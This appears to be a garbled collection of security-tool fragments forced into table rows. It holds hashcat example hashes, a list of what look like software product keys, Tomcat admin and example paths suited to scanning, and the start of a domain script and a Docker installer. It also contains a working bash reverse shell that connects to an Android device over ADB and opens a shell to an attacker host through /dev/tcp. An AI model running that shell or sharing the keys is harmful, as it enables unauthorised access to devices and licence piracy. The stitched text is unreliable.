Unless otherwise noted, the password for all example hashes is hashcat
Hash-Mode | Hash-Name | Example |
---|---|---|
0 | MD5 | 8743b52063cd84097a65d1633f5c74f5 |
10 | md5($pass.$salt) | 01dfae6e5d4d90d9892622325959afbe:7050461 |
! | |
!= | |
&& | |
= | |
== | |
?: | |
@ | |
__ | |
0 | |
00 |
KFZUS-F3JGV-T95Y7-BXGAS-5NHHP | |
T3ZWQ-P2738-3FJWS-YE7HT-6NA3K | |
KFZUS-F3JGV-T95Y7-BXGAS-5NHHP | |
65Z2L-P36BY-YWJYC-TMJZL-YDZ2S | |
SFZHH-2Y246-Z483L-EU92B-LNYUA | |
GSZVS-5W4WA-T9F2E-L3XUX-68473 | |
FTZ8A-R3CP8-AVHYW-KKRMQ-SYDLS | |
Q3ZWN-QWLZG-32G22-SCJXZ-9B5S4 | |
DAZPH-G39D3-R4QY7-9PVAY-VQ6BU | |
KLZ5G-X37YY-65ZYN-EUSV7-WPPBS |
/admin | |
/admin-console | |
/docs/ | |
/examples | |
/examples/jsp/index.html | |
/examples/jsp/snp/snoop.jsp | |
/examples/jsp/source.jsp | |
/examples/servlet/HelloWorldExample | |
/examples/servlet/SnoopServlet | |
/examples/servlet/TroubleShooter |
#!/usr/bin/env python | |
import argparse | |
import urllib.request | |
import concurrent.futures | |
from datetime import datetime, timedelta | |
import sys | |
domains = ["vavkamil.cz"] |
#!/bin/bash | |
# Simple reverse shell on android devie using Android Debug Bridge ensure you run nc -lvp 4444 on another screen first. | |
# By Random_Robbie | |
adb connect $1:5555 | |
adb shell sh -i >& /dev/tcp/$2/4444 0>&1 | |
echo "[*] Should have a shell now ..... Be nice :) [*]" |
#!/bin/sh | |
# From https://www.hiroom2.com/2017/09/24/parrotsec-3-8-docker-engine-en/ | |
set -e | |
# Install dependencies. | |
sudo apt install -y curl apt-transport-https \ | |
software-properties-common ca-certificates | |
# Install docker. |